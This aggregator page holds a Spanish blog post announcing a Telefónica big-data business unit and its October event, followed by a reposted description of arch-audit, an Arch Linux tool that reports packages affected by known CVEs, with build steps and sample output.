Figura 2: Proyecto de movilidad con el consorcio de transportes de Zaragoza

El procesado de los datos puede dar mucho valor a una empresa y hacer que revierta de forma muy positiva en su cuenta de resultados. Pero para llegar al momento en que una compañía sea Data-Driven, primero hay que pasar por las fases de exploración, donde mediante casos de uso puntuales una compañía prueba a resolver algún caso de negocio con tecnologías de BigData, y la fase de transformación, donde se deben acometer muchos cambios tecnológicos, organizativos, culturales y de procesos, para poder llegar a la fase final, donde una compañía ya es Data-Driven.

Figura 3: Agenda del evento del 20 de Octubre

En esta nueva unidad, que presentamos el día 20 de Octubre en el Auditorio del Edificio Central de Telefónica en el Distrito C, hemos incluido todas las capacidades que tenemos en nuestra compañía y que llevan ya tiempo ayudando a las empresas en esa transformación digital. Las unidades de SmartSteps, que dan soluciones a problemas de movilidad en las ciudades o respuestas a problemas de de análisis de eventos en sociedades, SmartDigits para la gestión de la protección contra el fraude o la empresa Synergic Partners, una de las compañías líderes en el mundo de la consultoría de datos,  que fue adquirida por Telefónica a principios de este año, formarán parte de esta nueva unidad.

Figura 4: Servicio de Travel Alerts sobre plataforma SmartDigits

Pero con el mismo espíritu de desarrollo de tecnología que tenemos en ElevenPaths, también nace con el espíritu de innovar en tecnología y estamos desarrollando nuevos productos y herramientas, que van desde soluciones centradas en proporcionar plataformas analíticas sobre los datos de los servicios core de Telefónica, hasta integraciones tecnológicas con otras plataformas.

Por supuesto, también contamos con nuestros partners y las empresas en las que ya hemos invertido, como el caso de CartoDB, en la que Telefónica invirtió vía el fondo Kibo Ventures o Inbenta, empresa centrada en interfaces de cliente usando procesado de lenguaje natural e inteligencia artíficial, por citar solo algunas.

Figura 5: Presentación de los Big Data Awards

La puesta de largo será el próximo jueves, como os he dicho al principio, y allí en el evento intentaremos explicar y mostrar las cosas que ya estamos haciendo, y en las que vamos a trabajar. El evento, está abierto para que puedas venir, y está pensado sobre todo para responsables de negocio, responsables de transformación digital o responsables de datos, pero también para cualquiera que esté pensando en recorrer el camino para convertir su área de negocio o su empresa en una organización que toma las decisiones en base a datos y no a intuiciones o planficaciones. Toma Data-Driven Decissions.

Saludos Malignos!

Sigue Un informático en el lado del mal - Google+RSS0xWord

Via:www.elladodelmal.com

arch-audit - An utility like pkg-audit for Arch Linux

October 15, 2016, 7:57 am

≫ Next: Vulnerabilidad de Cross-Site Scripting en IBM iNotes

≪ Previous: 20 de Octubre: Data-Driven Decissions - Let your data Speak

$

0

0

An utility like pkg-audit for Arch Linux. Based on Arch CVE Monitoring Team data

Uses data collected by the awesome Arch CVE Monitoring Team .

Installation

From AUR
The PKGBUILD is available on AUR .
After the installation just execute arch-audit .

From sources

git clone https://github.com/ilpianista/arch-audit
cd arch-audit
cargo build
cargo run

Example output

$ arch-audit
Package libwmf is affected by ["CVE-2009-1364", "CVE-2006-3376", "CVE-2007-0455", "CVE-2007-2756", "CVE-2007-3472", "CVE-2007-3473", "CVE-2007-3477", "CVE-2009-3546", "CVE-2015-0848", "CVE-2015-4588", "CVE-2015-4695", "CVE-2015-4696"]. VULNERABLE!
Package libtiff is affected by ["CVE-2016-5875", "CVE-2016-5314", "CVE-2016-5315", "CVE-2016-5316", "CVE-2016-5317", "CVE-2016-5320", "CVE-2016-5321", "CVE-2016-5322", "CVE-2016-5323", "CVE-2016-5102", "CVE-2016-3991", "CVE-2016-3990", "CVE-2016-3945", "CVE-2016-3658", "CVE-2016-3634", "CVE-2016-3633", "CVE-2016-3632", "CVE-2016-3631", "CVE-2016-3625", "CVE-2016-3624", "CVE-2016-3623", "CVE-2016-3622", "CVE-2016-3621", "CVE-2016-3620", "CVE-2016-3619", "CVE-2016-3186", "CVE-2015-8668", "CVE-2015-7313", "CVE-2014-8130", "CVE-2014-8127", "CVE-2010-2596", "CVE-2016-6223"]. VULNERABLE!
Package libtiff is affected by ["CVE-2015-7554", "CVE-2015-8683"]. VULNERABLE!
Package jasper is affected by ["CVE-2015-8751"]. VULNERABLE!
Package jasper is affected by ["CVE-2015-5221"]. VULNERABLE!
Package jasper is affected by ["CVE-2015-5203"]. VULNERABLE!
Package lib32-openssl is affected by ["CVE-2016-2177", "CVE-2016-2178", "CVE-2016-2179", "CVE-2016-2180", "CVE-2016-2181", "CVE-2016-2182", "CVE-2016-2183", "CVE-2016-6302", "CVE-2016-6303", "CVE-2016-6304", "CVE-2016-6306"]. Update to 1:1.0.2.i-1!
Package wireshark-cli is affected by ["CVE-2016-7180", "CVE-2016-7175", "CVE-2016-7176", "CVE-2016-7177", "CVE-2016-7178", "CVE-2016-7179"]. Update to 2.2.0-1!
Package wpa_supplicant is affected by ["CVE-2016-4477", "CVE-2016-4476"]. VULNERABLE!
Package openssl is affected by ["CVE-2016-2177", "CVE-2016-2178", "CVE-2016-2179", "CVE-2016-2180", "CVE-2016-2181", "CVE-2016-2182", "CVE-2016-2183", "CVE-2016-6302", "CVE-2016-6303", "CVE-2016-6304", "CVE-2016-6306"]. Update to 1.0.2.i-1!
Package crypto++ is affected by ["CVE-2016-7420"]. VULNERABLE!
Package bzip2 is affected by ["CVE-2016-3189"]. VULNERABLE!
Package libimobiledevice is affected by ["CVE-2016-5104"]. VULNERABLE!
Package libusbmuxd is affected by ["CVE-2016-5104"]. VULNERABLE!
Package gdk-pixbuf2 is affected by ["CVE-2016-6352"]. VULNERABLE!

$ arch-audit --upgradable --quiet
wireshark-cli>=2.2.0-1
openssl>=1.0.2.i-1
lib32-openssl>=1:1.0.2.i-1

$ arch-audit -uf "%n|%c"
openssl|CVE-2016-2177,CVE-2016-2178,CVE-2016-2179,CVE-2016-2180,CVE-2016-2181,CVE-2016-2182,CVE-2016-2183,CVE-2016-6302,CVE-2016-6303,CVE-2016-6304,CVE-2016-6306
wireshark-cli|CVE-2016-7180,CVE-2016-7175,CVE-2016-7176,CVE-2016-7177,CVE-2016-7178,CVE-2016-7179
lib32-openssl|CVE-2016-2177,CVE-2016-2178,CVE-2016-2179,CVE-2016-2180,CVE-2016-2181,CVE-2016-2182,CVE-2016-2183,CVE-2016-6302,CVE-2016-6303,CVE-2016-6304,CVE-2016-6306

Download arch-audit

Via:www.kitploit.com